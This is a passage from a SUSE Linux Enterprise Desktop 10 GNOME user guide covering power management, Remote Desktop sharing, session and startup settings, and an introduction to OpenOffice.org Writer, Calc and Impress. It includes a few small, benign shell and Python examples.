You can also specify what your computer does when the battery reaches the critical level. The available options are:

• Do Nothing: The computer does not shut down or automatically go into any kind of power-saving mode.
• Hibernate: The computer saves the contents of RAM to the hard disk, then shuts down. When you turn the computer on again, the saved data is put back into RAM, restoring your computer to the state it was in before it shut off. Hibernate requires an amount of free hard disk space equal to the amount of RAM installed on the computer.
• Shut Down: The computer turns off without saving anything. All unsaved data is lost.

Choose the option you prefer by selecting it from the menu. If you have sufficient free disk space, Hibernate is the better choice.

Setting Advanced Power Options

The advanced power options let you specify how and when the Power icon is displayed and at what point the battery is considered low or critical. Open the Power Management module, then click the Advanced tab to set these options. You can specify whether the power icon is always or never displayed in the System Tray, or that it is present only when the battery is low, or when it is either charging or discharging. You can also select the percentage of battery power remaining that is to be considered low or critical. Slide the slider for each option until the desired percentage is specified.
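As noted above, Hibernate needs free hard disk space equal to the amount of installed RAM. The following is a rough sketch of how to check this from a terminal; it compares total RAM from /proc/meminfo with the free space on the root file system. Depending on how suspend-to-disk is configured, the memory image may actually be written to a swap partition instead, so treat this only as a quick estimate.

```shell
# Total installed RAM in KB, from the MemTotal line of /proc/meminfo.
mem_kb=$(awk '/^MemTotal:/ {print $2}' /proc/meminfo)

# Free space on the root file system in KB (-P keeps df output on one line).
free_kb=$(df -kP / | awk 'NR==2 {print $4}')

if [ "$free_kb" -ge "$mem_kb" ]; then
    echo "enough free space for hibernate"
else
    echo "not enough free space for hibernate"
fi
```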
2.4.5 Setting Preferred Applications
The Preferred Applications module allows you to specify which applications to use for various common tasks:
54
SUSE Linux Enterprise Desktop 10 GNOME User Guide
To change any of these settings:

1 Click Computer > Control Center > System > Preferred Applications.
2 Click the tab for the type of application you want to set. The following list shows the options and default settings:
• Web browser (default: Firefox)
• Mail reader (default: Evolution)
• FTP (default: Nautilus)
• News (default: Thunderbird)
• Terminal (default: GNOME Terminal)
3 Select one of the available applications from the Choose menu, or enter the command used to start the application.
4 Click Close.

The changes take effect immediately.
2.4.6 Setting Session Sharing Preferences
The Remote Desktop preference tool enables you to share a GNOME desktop session between multiple users, and to set session-sharing preferences. To open this tool, click Computer > Control Center > System > Remote Desktop. The table below shows the session sharing preferences that can be set with this tool. These settings have a direct impact on the security of your system.
Table 2-9 Session Sharing Preferences
Dialog Element
Description
Allow other users to view your desktop: Select this option to enable remote users to view your session. All keyboard, pointer, and clipboard events from the remote user are ignored.
Allow other users to control your desktop: Select this option to allow other users to access and control your session from a remote location.
Users can view your desktop using this command: Click on the highlighted text to send the system address to the remote user by e-mail.
When a user tries to view or control your desktop
Select from the following security considerations when a user tries to view or control your desktop:
• Ask you for confirmation: Select this option if you want remote users to ask you for confirmation when they want to share your session. This option enables you to be aware when other users connect to your session. You can also decide what time is suitable for the remote user to connect to your session.
• Require the user to enter this password: Select this option to authenticate the remote user if authentication is used. This option provides an extra level of security.
Enter the password that the remote user who wants to view or control your session must enter.
2.4.7 Managing Sessions
This module lets you manage your sessions. A session occurs between the time that you log in to the desktop environment and the time that you log out. You can set session preferences and specify which applications to start when you begin a session. You can configure sessions to save the state of applications and then restore the state when you start another session. You can also use this preference tool to manage multiple sessions. For example, you might have a mobile session which starts applications you use most frequently when traveling, a demo session that starts applications used to present a demonstration or slide show to a customer, and a work session that uses a different set of applications when you are working in the office. Click Computer > Control Center > System > Sessions. This module consists of three tabbed pages:

• Session Options: Lets you manage multiple sessions and set preferences for the current session.
• Current Session: Lets you specify startup order values and select restart styles for the session-managed applications in your current session.
• Startup Programs: Lets you specify non-session-managed startup applications, which start automatically when you start a session.
Setting Session Preferences Use the Session Options tabbed page to manage multiple sessions and set preferences for the current session.
Figure 2-18 Sessions Dialog—Session Options Page
The following table lists the session options that you can modify.
Table 2-10 Session Preferences for Current Session
Option
Description
Show Splash Screen on Login: Displays a splash screen when you start a session.
Prompt on Logout: Displays a confirmation dialog when you end a session.
Automatically Save Changes to Session: Automatically saves the current state of your session. The session manager saves the session-managed applications that are open and the settings associated with the session-managed applications. The next time you start a session, the applications start automatically with the saved settings. If you do not select this option, the Logout Confirmation dialog displays a Save Current Setup option when you end your session.
Sessions: Lets you manage multiple sessions in the desktop, as follows:
• To create a new session, click Add. The Add a New Session dialog is displayed, letting you specify a name for your session.
• To change the name of a session, select the session and then click Edit. The Edit Session Name dialog is displayed, letting you specify a new name for your session.
• To delete a session, select the session and then click Delete.
Setting Session Properties Use the Current Session tabbed page to specify startup order values and to choose restart styles for the session-managed applications in your current session.
Figure 2-19 Sessions Dialog—Current Session Page
The following table lists the session properties that you can configure.
Table 2-11 Session Properties for Session-Managed Applications
Option
Description
Order
Specifies the order in which the session manager starts session-managed startup applications. The session manager starts applications with lower order values first. The default value is 50. To set the startup order of an application, select the application in the table. Use the Order box to specify the startup order value.
Style
Determines the restart style of an application. To select a restart style for an application, select the application in the table and then select one of the following styles:
• Normal: Starts automatically when you start a session. Use the kill command to terminate applications with this restart style during a session.
• Restart: Restarts automatically when you close or terminate the application. Select this style for an application if it must run continuously during your session. To terminate an application with this restart style, select the application in the table and then click Remove.
• Trash: Does not start when you start a session.
• Settings: Starts automatically when you start a session. Applications with this style usually have a low startup order and store your configuration settings for GNOME and session-managed applications.
Remove: Deletes the selected application from the list. The application is removed from the session manager and closed. Applications that you delete are not started the next time you start a session.
Apply: Applies changes made to the startup order and the restart style.
Configuring Startup Applications Use the Startup Programs tabbed page to specify non-session-managed startup applications.
Figure 2-20 Sessions Dialog—Startup Programs Page
Startup applications are applications that start automatically when you begin a session. You specify the commands that run these applications, and the commands execute automatically when you log in. You can also start session-managed applications automatically. For more information, see “Setting Session Preferences” on page 57.

To add a startup application, click Add. The Add Startup Program dialog is displayed. Specify the command to start the application in the Startup Command field. If you specify more than one startup application, use the Order box to specify the startup order of each application.

To edit a startup application, select the startup application and then click Edit. The Edit Startup Program dialog is displayed. Modify the command and the startup order for the startup application.

To delete a startup application, select the startup application and then click Delete.
2.4.8 Setting Sound Preferences
The Sound Preference tool lets you control when the sound server starts. You can also specify which sounds to play when particular events occur. Click Computer > Control Center > System > Sound.
Setting General Sound Preferences Use the Sounds tab to specify when to launch the sound server. You can also enable sound event functions.
Figure 2-21 Sound Preferences Dialog—General Page
Click Enable software sound mixing (ESD) to start the sound server when you start a session. When the sound server is active, the desktop can play sounds. Click Play system sounds to play sounds when particular events occur in the desktop. Finally, select the sound to play at each of the specified events.
Setting System Beep Preferences Some applications play a beep sound to indicate a keyboard input error. Use the System Beep tab to set preferences for the system beep.
Figure 2-22 Sound Preferences Dialog—System Beep Page
2.4.9 Managing Users and Groups
Use the User Management tool to manage users and groups, including user and group names, group membership, password and password encryption, and other options. Click Computer > Control Center > System > User Management. The User Management tool opens the User and Group Administration module in YaST.
NOTE: Root privileges are required to manage users and groups. Follow the directions in YaST for information on changing settings.
II Office and Collaboration
3 The OpenOffice.org Office Suite
OpenOffice.org is a powerful open-source office suite that provides tools for all types of office tasks, such as writing texts, working with spreadsheets, or creating graphics and presentations. With OpenOffice.org, you can use the same data across different computing platforms. You can also open and edit files in other formats, including Microsoft Office, then save them back to this format, if needed. This chapter covers information about the Novell® edition of OpenOffice.org and some of the key features you should be aware of when getting started with the suite.

• Section 3.1, “Understanding OpenOffice.org,” on page 65
• Section 3.2, “Word Processing with Writer,” on page 72
• Section 3.3, “Using Spreadsheets with Calc,” on page 78
• Section 3.4, “Using Presentations with Impress,” on page 80
• Section 3.5, “Using Databases with Base,” on page 81
• Section 3.6, “Creating Graphics with Draw,” on page 83
• Section 3.7, “Creating Mathematical Formulas with Math,” on page 84
• Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84

OpenOffice.org consists of several application modules (subprograms), which are designed to interact with each other. They are listed in Table 3-1. A full description of each module is available in the online help, described in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84.
Table 3-1 The OpenOffice.org Application Modules
Module
Purpose
Writer: Word processor application module
Calc: Spreadsheet application module
Impress: Presentation application module
Base: Database application module
Draw: Application module for drawing vector graphics
Math: Application module for generating mathematical formulas
The appearance of the application varies depending on the desktop or window manager you use. Regardless of the appearance, the basic layout and functions are the same.
3.1 Understanding OpenOffice.org
This section contains information that applies to all of the application modules in OpenOffice.org. Module-specific information can be found in the sections relating to each module. • Section 3.1.1, “What’s New in OpenOffice.org 2.0,” on page 66
• Section 3.1.2, “Enhancements in the Novell Edition of OpenOffice.org 2.0,” on page 66 • Section 3.1.3, “Using the Standard Edition of OpenOffice.org,” on page 67 • Section 3.1.4, “Compatibility with Other Office Applications,” on page 67 • Section 3.1.5, “Starting OpenOffice.org,” on page 69 • Section 3.1.6, “Improving OpenOffice.org Load Time,” on page 69 • Section 3.1.7, “Customizing OpenOffice.org,” on page 69 • Section 3.1.8, “Finding Templates,” on page 72
3.1.1 What’s New in OpenOffice.org 2.0
OpenOffice.org 2.0 contains many improvements and features that were not included in earlier versions. The biggest new feature is the Base database module. There have been many other changes since the previous version, such as enhanced PDF export and improved word count capabilities. For a complete list of features, fixes, and enhancements, go to the OpenOffice.org Web site (http://).
3.1.2 Enhancements in the Novell Edition of OpenOffice.org 2.0
The Novell Edition of OpenOffice.org included with SLED contains enhancements that are not available in the standard edition. These include:

Integration with SUSE Linux Enterprise Desktop
The Novell Edition of OpenOffice.org features redesigned tool bar icons for maximum consistency with SUSE Linux Enterprise Desktop, including support for desktop appearance or theme changes. These features provide a consistent interface across the Linux desktop, which enhances overall usability and helps minimize enterprise training and support requirements.

Native Desktop Dialogs
The Novell Edition of OpenOffice.org uses your desktop’s native file dialogs rather than those in the standard edition. This provides the same look and feel of other applications in your environment, giving you a consistent, familiar experience.

Enhanced Support for Microsoft Office File Formats
OpenOffice.org supports import and export of Microsoft Office file formats, even taking advantage of compatible fonts to match document length. Transparent document sharing makes OpenOffice.org the best choice if you are deploying Linux desktops. If that option is selected, the file is automatically converted and attached to an e-mail in your default e-mail application.
This allows OpenOffice.org to match fonts when opening documents originally composed in Microsoft Office, and very closely match pagination and page formatting.

Integration with Novell Evolution
The Novell Edition of OpenOffice.org is tightly integrated with Novell Evolution™, allowing users to send documents as e-mail and to perform mail merges using the Evolution address book as a data source.

Improved File Access
Files are available from any source available to the computer. Network files open and save seamlessly.

Anti-aliased Presentation Graphics
With hardware acceleration enabled (the default), the Novell Edition of OpenOffice.org provides higher-quality graphics in Impress slide shows.

Faster Start-up Times
The Novell Edition of OpenOffice.org includes an improved built-in quickstarter that loads OpenOffice.org components at system startup and thus improves the application’s start-up time. Subsequent document load times have also been improved.
3.1.3 Using the Standard Edition of OpenOffice.org
The standard edition of OpenOffice.org also works with SLED. If you install the latest version of OpenOffice.org, all of your Novell Edition files remain compatible. However, the standard edition does not contain the Novell enhancements.
3.1.4 Compatibility with Other Office Applications
OpenOffice.org can work with documents, spreadsheets, presentations, and databases in many other formats, including Microsoft Office. They can be seamlessly opened like other files and saved back to the original format. Because the Microsoft formats are proprietary and the specifications are not available to other applications, there are occasionally formatting issues. If you have problems with your documents, consider opening them in the original application and resaving in an open format such as RTF for text documents or CSV for spreadsheets.
TIP: For good information about migrating from other office suites to OpenOffice.org, refer to the OpenOffice.org Migration Guide ( 0600MG-MigrationGuide.pdf).

Converting Documents to the OpenOffice.org Format

OpenOffice.org can read, edit, and save documents in a number of formats. It is not necessary to convert files from those formats to the OpenOffice.org format to use those files. However, if you want to convert the files, you can do so. To convert a number of documents, such as when first switching to OpenOffice.org, do the following:

1 Select File > Wizard > Document Converter.
2 Choose the file format from which to convert. There are several StarOffice and Microsoft Office formats available.
3 Click Next.
4 Specify where OpenOffice.org should look for templates and documents to convert and in which directory the converted files should be placed.
IMPORTANT: Documents from a Windows partition are usually in a subdirectory of /windows.
5 Make sure that all other settings are appropriate, then click Next.
6 Review the summary of the actions to perform, then start the conversion by clicking Convert.

The amount of time needed for the conversion depends on the number of files and their complexity. For most documents, conversion does not take very long.

Sharing Files with Users of Other Office Suites

OpenOffice.org is available for a number of operating systems. This makes it an excellent tool when a group of users frequently need to share files and do not use the same system on their computers. When sharing documents with others, you have several options:

If the recipient needs to be able to edit the file: Save the document in the format the other user needs. For example, to save as a Microsoft Word file, click File > Save As, then select the Microsoft Word file type for the version of Word the other user needs.

If the recipient only needs to read the document: Export the document to a PDF file with File > Export as PDF. PDF files can be read on any platform using a viewer like Adobe Acrobat Reader.

If you want to share a document for editing: Use one of the standard document formats. The default formats comply with the OASIS standard XML format, making them compatible with a number of applications. TXT and RTF formats, although limited in formatting, might be a good option for text documents. CSV is useful for spreadsheets. OpenOffice.org might also offer your recipient’s preferred format, especially Microsoft formats.

If you want to e-mail a document as a PDF: Click File > Send > Document as PDF Attachment. Your default e-mail program opens with the file attached.

If you want to e-mail a document to a Microsoft Word user: Click File > Send > Document as MS-Doc Attachment. Your default e-mail program opens with the file attached.
3.1.5 Starting OpenOffice.org
1 Start the application in one of the following ways:
• On the menu bar, click the OpenOffice.org icon. This opens Writer. To open a different module, click File > New from the newly opened Writer document, then choose the module you want to open.
• From the Computer menu, click Computer > More Applications > Office, then click the name of the OpenOffice.org module you want to start.
• In a terminal window, enter ooffice. The OpenOffice.org window opens. Click File > New, then choose the module you want to open.
2 Select the module you want to open.

If any OpenOffice.org application is open, you can open any of the other applications by clicking File > New > Name of Application.
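Building on the terminal method above, the ooffice command in OpenOffice.org 2.x also accepts module flags such as -writer and -calc, which open a specific module directly instead of the default Writer window. The flag names here are assumptions based on the 2.x command-line interface; the helper below only assembles and prints the matching command line, so you can see the mapping (drop the echo to actually launch the application).

```shell
# Sketch: map a module name to the ooffice command line used to open it.
# Replace "echo ooffice" with just "ooffice" to launch for real.
oo_launch() {
    case "$1" in
        writer|calc|impress|base|draw|math)
            echo ooffice "-$1" ;;
        *)
            echo ooffice ;;   # no module given: open the default window
    esac
}

oo_launch writer    # prints: ooffice -writer
oo_launch calc      # prints: ooffice -calc
```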
3.1.6 Improving OpenOffice.org Load Time
To speed up the load time of OpenOffice.org by preloading the application at system startup:
1 Click Tools > Options > Memory.
2 Select Start at Startup.
The next time you restart your system, OpenOffice.org will preload. When you open an OpenOffice.org application module, it will open faster.
3.1.7 Customizing OpenOffice.org
You can customize OpenOffice.org to best suit your needs and working style. Toolbars, menus, and keyboard shortcuts can all be customized, and macros can be assigned to events such as Start Application. This section contains simple, generic instructions for customizing your environment. The changes you make are effective immediately, so you can see if the changes are what you wanted and go back and modify them if they weren’t. See the OpenOffice.org help files for detailed instructions.

Customizing Toolbars

Use the Customize dialog to modify OpenOffice.org toolbars.
1 Click the arrow icon at the end of any toolbar.
2 Click Customize Toolbar.
3 Select the toolbar you want to customize.
4 Select the check boxes next to the commands you want to appear on the toolbar, and deselect the check boxes next to the commands you don’t want to appear.
5 Select whether to save your customized toolbar in the OpenOffice.org module you are using or in the document.
• OpenOffice.org module
The customized toolbar is used whenever you open that module.
• Document filename
The customized toolbar is used whenever you open that document.
6 Repeat to customize additional toolbars.
7 Click OK.

You can quickly choose the buttons that appear on a particular toolbar:
1 Click the arrow icon at the end of the toolbar you want to change.
2 Click Visible Buttons to display a list of buttons.
3 Select the buttons in the list that appears to enable (check) or disable (uncheck) them.

Customizing Menus

You can add or delete items from current menus, reorganize menus, and even create new menus.
1 Click Tools > Customize > Menu.
2 Select the menu you want to change, or click New to create a new menu. Click Help for more information about the options in the Customize dialog.
3 Modify, add, or delete menu items as desired.
4 Click OK.

Customizing Keyboard Shortcuts

You can reassign currently assigned keyboard shortcuts and assign new shortcuts to frequently used functions.
1 Click Tools > Customize > Keyboard.
2 Select the keys you want to assign to a function, or select the function and assign the keys or key combinations. Click Help for more information about the options in the Customize dialog.
3 Modify, add, or delete keyboard shortcuts as desired.
4 Click OK.

Customizing Events

OpenOffice.org also provides ways to assign macros to events such as application startup or the saving of a document. The assigned macro runs automatically whenever the selected event occurs.
1 Click Tools > Customize > Events.
2 Select the event you want to change. Click Help for more information about the options in the Customize dialog box.
3 Assign or remove macros for the selected event.
4 Click OK.
Changing the Global Settings Global settings can be changed in any OpenOffice.org application by clicking Tools > Options on the menu bar. This opens the window shown in the figure below. A tree structure is used to display categories of settings.
Figure 3-1 The Options Window
The following table lists the settings categories along with a brief description of each category:
Table 3-2 Global Setting Categories
Settings Category
Description
OpenOffice.org: Various basic settings, including your user data (such as your address and e-mail), important paths, and settings for printers and external programs.
Load/Save: Includes the settings related to the opening and saving of several file types. There is a dialog for general settings and several special dialogs to define how external formats should be handled.
Language Settings: Covers the various settings related to languages and writing aids, such as your locale and spell checker settings. This is also the place to enable support for Asian languages.
Internet: Includes the dialogs to configure any proxies and to change settings related to search engines.
Text Document: Configures the global word processing options, such as the basic fonts and layout that Writer should use.
HTML Document: Changes the settings related to the HTML authoring features of OpenOffice.org.
Spreadsheet: Changes the settings for Calc, such as those related to sort lists and grids.
Presentation: Changes the settings that should apply to all presentations. For example, you can specify the measurement unit for the grid used to arrange elements.
Drawing: Includes the settings related to the vector drawing module, such as the drawing scale, grid properties, and some print options.
Formula: Provides a single dialog to set special print options for formulas.
Chart: Defines the default colors used for newly created charts.
Data Sources: Defines how external data sources should be accessed.
IMPORTANT: All settings listed in the table are applied globally. They are used as defaults for every new document you create.
3.1.8 Finding Templates
Templates greatly enhance the use of OpenOffice.org by simplifying formatting tasks for a variety of different types of documents. OpenOffice.org comes with a few templates, and you can find additional templates on the Internet. You can also create your own. Creating templates is beyond the scope of this guide, but detailed instructions are found in the OpenOffice.org help system and in other documents and tutorials available online. In addition to templates, you can find other extras and add-ins online. The following table lists a few of the prominent places where you can find templates and other extras. (Because Web sites often close or their content changes, the information in the following table might not be current when you read it.)
Table 3-3 Where to Find OpenOffice.org Templates and Extras
Location
What You Can Find
OpenOffice.org documentation Web site (http://documentation.openoffice.org/Samples_Templates/User/template_2_x/index.html): Templates for Calc spreadsheets, CD cases, seed packets, fax cover sheets, and more

Worldlabel.com ( openoffice-template.htm): Templates for many types of labels
For more information about templates, see Section 3.2.4, “Using Templates to Format Documents,” on page 76 and Section 3.3.2, “Using Templates in Calc,” on page 79.
3.2 Word Processing with Writer
OpenOffice.org Writer is a full-featured word processor with page and text formatting capabilities. Its interface is similar to interfaces for other major word processors, and it includes some features that are usually found only in expensive desktop publishing applications. This section highlights a few key features of Writer. For more information about these features and for complete instructions for using Writer, look at the OpenOffice.org help or any of the sources listed in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84.
NOTE: Much of the information in this section can also be applied to other OpenOffice.org modules. For example, other modules use styles similarly to how they are used in Writer. • Section 3.2.1, “Creating a New Document,” on page 73 • Section 3.2.2, “Sharing Documents with Other Word Processors,” on page 73 • Section 3.2.3, “Formatting with Styles,” on page 74 • Section 3.2.4, “Using Templates to Format Documents,” on page 76 • Section 3.2.5, “Working with Large Documents,” on page 76 • Section 3.2.6, “Using Writer as an HTML Editor,” on page 78
3.2.1 Creating a New Document
There are two ways to create a new document:

To create a document from scratch, click File > New > Text Document.

To use a standard format and predefined elements for your own documents, try a wizard. Wizards are small utilities that let you make some basic decisions and then produce a ready-made document from a template. For example, to create a business letter, click File > Wizards > Letter. Using the wizard’s dialogs, you can easily create a basic document in a standard format. A sample wizard dialog is shown in Figure 3-2.
Figure 3-2 An OpenOffice.org Wizard
Enter text in the document window as desired. Use the Formatting toolbar or the Format menu to adjust the appearance of the document. Use the File menu or the relevant buttons in the toolbar to print and save your document. With the options under Insert, add extra items to your document, such as a table, picture, or chart.
3.2.2 Sharing Documents with Other Word Processors
You can use Writer to edit documents created in a variety of other word processors. For example, you can import a Microsoft Word document, edit it, and save it again as a Word document. Most
Word documents can be imported into OpenOffice.org without any problem. Formatting, fonts, and all other aspects of the document remain intact. However, some very complex documents—such as documents containing complicated tables, Word macros, or unusual fonts or formatting—might require some editing after being imported. OpenOffice.org can also save in many popular word processing formats. Likewise, documents created in OpenOffice.org and saved as Word files can be opened in Microsoft Word without any trouble. So, if you use OpenOffice.org in an environment where you frequently share documents with Word users, you should have little or no trouble exchanging document files. Just open the files, edit them, and save them as Word files.
3.2.3 Formatting with Styles
OpenOffice.org uses styles for applying consistent formatting to various elements in a document. The following types of styles are available:
Table 3-4 About the Types of Styles

Paragraph: Applies standardized formatting to the various types of paragraphs in your document. For example, apply a paragraph style to a first-level heading to set the font and font size, spacing above and below the heading, location of the heading, and other formatting specifications.

Character: Applies standardized formatting for types of text. For example, if you want emphasized text to appear in italics, you can create an emphasis style that italicizes selected text when you apply the style to it.

Frame: Applies standardized formatting to frames. For example, if your document uses sidebars, you can create frames with specified graphics, borders, location, and other formatting so that all of your sidebars have a consistent appearance.

Page: Applies standardized formatting to a specified type of page. For example, if every page of your document contains a header and footer except for the first page, you can use a first page style that disables headers and footers. You can also use different page styles for left and right pages so that you have bigger margins on the insides of pages and your page numbers appear on an outside corner.

List: Applies standardized formatting to specified list types. For example, you can define a checklist with square check boxes and a bullet list with round bullets, then easily apply the correct style when creating your lists.
Opening the Styles and Formatting Window

The Styles and Formatting window (called the Stylist in earlier versions of OpenOffice.org) is a versatile formatting tool for applying styles to text, paragraphs, pages, frames, and lists. To open this window, click Format > Styles and Formatting. OpenOffice.org comes with several predefined styles. You can use these styles as they are, modify them, or create new styles.

TIP: By default, the Styles and Formatting window is a floating window; that is, it opens in its own window that you can place anywhere on the screen. If you use styles extensively, you might find it helpful to dock the window so that it is always present in the same part of the Writer interface. To dock
SUSE Linux Enterprise Desktop 10 GNOME User Guide
the Styles and Formatting window, press Control while you double-click a gray area in the window. This tip applies to some other windows in OpenOffice.org as well, including the Navigator.

Applying a Style

To apply a style, select the element you want to apply the style to, then double-click the style in the Styles and Formatting window. For example, to apply a style to a paragraph, place the cursor anywhere in that paragraph and double-click the desired style.

Using Styles Versus Using Formatting Buttons and Menu Options

Using styles rather than the Format menu options and buttons helps give your pages, paragraphs, text, and lists a more consistent look and makes it easier to change your formatting. For example, if you emphasize text by selecting it and clicking the Bold button, then later decide you want emphasized text to be italicized, you need to find all of your bolded text and manually change it to italics. If you use a character style, you only need to change the style from bold to italics, and all text that has been formatted with that style automatically changes from bold to italics.

Text formatted with a menu option or button overrides any styles you have applied. If you use the Bold button to format some text and an emphasis style to format other text, changing the style does not change the text that you formatted with the button, even if you later apply the style to the text you bolded with the button. You must manually unbold the text and then apply the style. Likewise, if you manually format your paragraphs using Format > Paragraph, it is easy to end up with inconsistent paragraph formatting. This is especially true if you copy and paste paragraphs from other documents with different formatting.

Changing a Style

Styles are powerful because you can change formatting throughout a document by changing a style, rather than applying the change separately everywhere you want the new formatting.
1 In the Styles and Formatting window, right-click the style you want to change.
2 Click Modify.
3 Change the settings for the selected style. For information about the available settings, refer to the OpenOffice.org online help.
4 Click OK.

Creating a Style

OpenOffice.org comes with a collection of styles to suit many users’ needs. However, most users eventually need a style that does not yet exist. To create a new style:

1 Right-click in any empty space in the Styles and Formatting window. Make sure you are in the list of styles for the type of style you want to create. For example, if you are creating a character style, make sure you are in the character style list.
2 Click New.
3 Name your style and choose the settings you want applied with that style.
4 Click OK.
For details about the style options available in any tab, click that tab and then click Help.
3.2.4 Using Templates to Format Documents
Most word processor users create more than one kind of document. For example, you might write letters, memos, and reports, all of which look different and require different styles. If you create a template for each of your document types, the styles you need for each document are always readily available.

Creating a template requires a little bit of up-front planning. You need to determine what you want the document to look like so you can create the styles you need in that template. You can always change your template, but a little planning can save you a lot of time later.

NOTE: You can convert Microsoft Word templates like you would any other Word document. See “Converting Documents to the OpenOffice.org Format” on page 68 for information.

A detailed explanation of templates is beyond the scope of this section. However, more information is found in the help system, and detailed how-tos are found at the OpenOffice.org Documentation page.

Creating a Template

A template is a text document containing only the styles and content that you want to appear in every document, such as your address information and letterhead on a letter. When a document is created or opened with the template, the styles are automatically applied to that document. To create a template:

1 Click File > New > Text Document.
2 Create the styles and content that you want to use in any document that uses this template.
3 Click File > Templates > Save.
4 Specify a name for the template.
5 In the Categories box, click the category you want to place the template in. The category is the folder where the template is stored.
6 Click OK.
3.2.5 Working with Large Documents
You can use Writer to work on large documents. Large documents can be either a single file or a collection of files assembled into a single document.

Navigating in Large Documents

The Navigator tool displays information about the contents of a document. It also lets you quickly jump to different elements. For example, you can use the Navigator to get a quick overview of all images included in the document.
To open the Navigator, click Edit > Navigator. The elements listed in the Navigator vary according to the document loaded in Writer.
Figure 3-3 Navigator Tool in Writer
Click an item in the Navigator to jump to that item in the document.

Creating a Single Document from Multiple Documents

You can use a master document to assemble individual Writer files into a single large document. You can maintain chapters or other subdocuments as individual files collected in the master document. Master documents are also useful if multiple people are working on a document. You can separate each person’s portion of the document into subdocuments collected in a master document, allowing multiple writers to work on their subdocuments at the same time without fear of overwriting other people’s work.

NOTE: If you are coming to OpenOffice.org from Microsoft Word, you might be nervous about using master documents because the master document feature in Word has a reputation for corrupting documents. This problem does not exist in OpenOffice.org Writer, so you can safely use master documents to manage your projects.

To create a master document:

1 Click File > New > Master Document.
or
Open an existing document and click File > Send > Create Master Document.
2 Insert subdocuments.
3 Click File > Save.

The OpenOffice.org help files contain more complete information about working with master documents. Look for the topic entitled “Using Master Documents and Subdocuments.”
TIP: The styles from all of your subdocuments are imported into the master document. To ensure that formatting is consistent throughout your master document, you should use the same template for each subdocument. Doing so is not mandatory; however, if subdocuments are formatted differently, you will probably need to do some reformatting to successfully bring subdocuments into the master document without creating inconsistencies. For example, if two documents imported into your master document include different styles with the same name, the master document will use the formatting specified for that style in the first document you import.
3.2.6 Using Writer as an HTML Editor
In addition to being a full-featured word processor, Writer also functions as an HTML editor. Writer includes HTML tags that can be applied as you would any other style in a Writer document. You can view the document as it will appear online, or you can directly edit the HTML code.

Creating an HTML Document

1 Click File > New > HTML Document.
2 Click the arrow at the bottom of the Formatting and Styles window.
3 Select HTML Styles.
4 Create your HTML document, using the styles to tag your text.
5 Click File > Save As.
6 Select the location where you want to save your file, name the file, and select HTML Document (.html) from the Filter list.
7 Click OK.

If you prefer to edit HTML code directly, or if you want to see the HTML code created when you edited the HTML file as a Writer document, click View > HTML Source. In HTML Source mode, the Formatting and Styles list is no longer available.

NOTE: The first time you switch to HTML Source mode, you are prompted to save the file as HTML if you have not already done so.
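Writer’s HTML styles correspond to ordinary HTML tags, which is what you see in View > HTML Source. The following sketch is not Writer’s actual export output; it only illustrates the tag-per-style mapping, with hypothetical sample text.

```python
# Map (tag, text) pairs to HTML the way named styles map to tags:
# "Heading 1" becomes <h1>, a body paragraph becomes <p>, and so on.
paragraphs = [
    ("h1", "My Page"),                                  # Heading 1 style
    ("p", "Body text tagged with a paragraph style."),  # Default style
]
body = "".join(f"<{tag}>{text}</{tag}>" for tag, text in paragraphs)
html = f"<html><body>{body}</body></html>"
print(html)
```

Tagging text with the right style in step 4 above is what produces this kind of semantic markup instead of purely visual formatting.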
3.3 Using Spreadsheets with Calc
Calc is the OpenOffice.org spreadsheet application. Create a new spreadsheet with File > New > Spreadsheet, or open one with File > Open. Calc can read and save in Microsoft Excel’s format, so it is easy to exchange spreadsheets with Excel users.

NOTE: Calc can process many VBA macros in Excel documents; however, support for VBA macros is not yet complete. When opening an Excel spreadsheet that makes heavy use of macros, you might discover that some do not work.

In the spreadsheet cells, enter fixed data or formulas. A formula can manipulate data from other cells to generate a value for the cell in which it is inserted. You can also create charts from cell values.

• Section 3.3.1, “Using Formatting and Styles in Calc,” on page 79
• Section 3.3.2, “Using Templates in Calc,” on page 79
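A formula’s job — deriving one cell’s value from other cells — can be modeled in a few lines. This is a toy model of a sheet as a dictionary, not Calc’s formula engine; the cell names just mirror Calc’s A1-style references.

```python
# A tiny "sheet" keyed by cell reference. Entering =A1+A2 in cell A3
# would compute exactly this: a value derived from other cells.
sheet = {"A1": 10, "A2": 32}
sheet["A3"] = sheet["A1"] + sheet["A2"]
print(sheet["A3"])  # 42
```

In Calc, changing A1 or A2 would recalculate A3 automatically; in this sketch you would have to recompute it yourself, which is precisely the bookkeeping a spreadsheet engine does for you.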
3.3.1 Using Formatting and Styles in Calc
Calc comes with a few built-in cell and page styles to improve the appearance of your spreadsheets and reports. Although these built-in styles are adequate for many uses, you will probably find it useful to create styles for your own frequently used formatting preferences.

Creating a Style

1 Click Format > Styles and Formatting.
2 In the Formatting and Styles window, click either the Cell Styles or the Page Styles icon.
3 Right-click in the Formatting and Styles window, then click New.
4 Specify a name for your style and use the various tabs to set the desired formatting options.
5 Click OK.

Modifying a Style

1 Click Format > Styles and Formatting.
2 In the Formatting and Styles window, click either the Cell Styles or the Page Styles icon.
3 Right-click the name of the style you want to change, then click Modify.
4 Change the desired formatting options.
5 Click OK.
3.3.2 Using Templates in Calc
If you use different styles for different types of spreadsheets, you can use templates to save your styles for each spreadsheet type. Then, when you create a particular type of spreadsheet, open the applicable template and the styles you need for that template are available in the Formatting and Styles window.

A detailed explanation of templates is beyond the scope of this section. However, more information is found in the help system, and detailed how-tos are found at the OpenOffice.org Documentation page.

Creating a Template

A Calc template is a spreadsheet that contains styles and content that you want to appear in every spreadsheet created with that template, such as headings or other cell styles. When a spreadsheet is created or opened with the template, the styles are automatically applied to that spreadsheet. To create a template:

1 Click File > New > Spreadsheet.
2 Create the styles and content that you want to use in any spreadsheet that uses this template.
3 Click File > Templates > Save.
4 Specify a name for the template.
5 In the Categories box, click the category you want to place the template in. The category is the folder where the template is stored.
6 Click OK.
3.4 Using Presentations with Impress
Use OpenOffice.org Impress to create presentations.

• Section 3.4.1, “Creating a Presentation,” on page 80
• Section 3.4.2, “Using Master Pages,” on page 80
3.4.1 Creating a Presentation
1 Click File > New > Presentation.
2 Select the option to use for creating the presentation.

There are two ways to create a presentation:

• Create an empty presentation: Opens Impress with a blank slide. Use this option to create a new presentation from scratch, without any preformatted slides.
• Create a presentation from a template: Opens Impress with your choice of template. Use this option to create a new presentation with a predesigned OpenOffice.org template or a template you’ve created or installed yourself, such as your company’s presentation template.

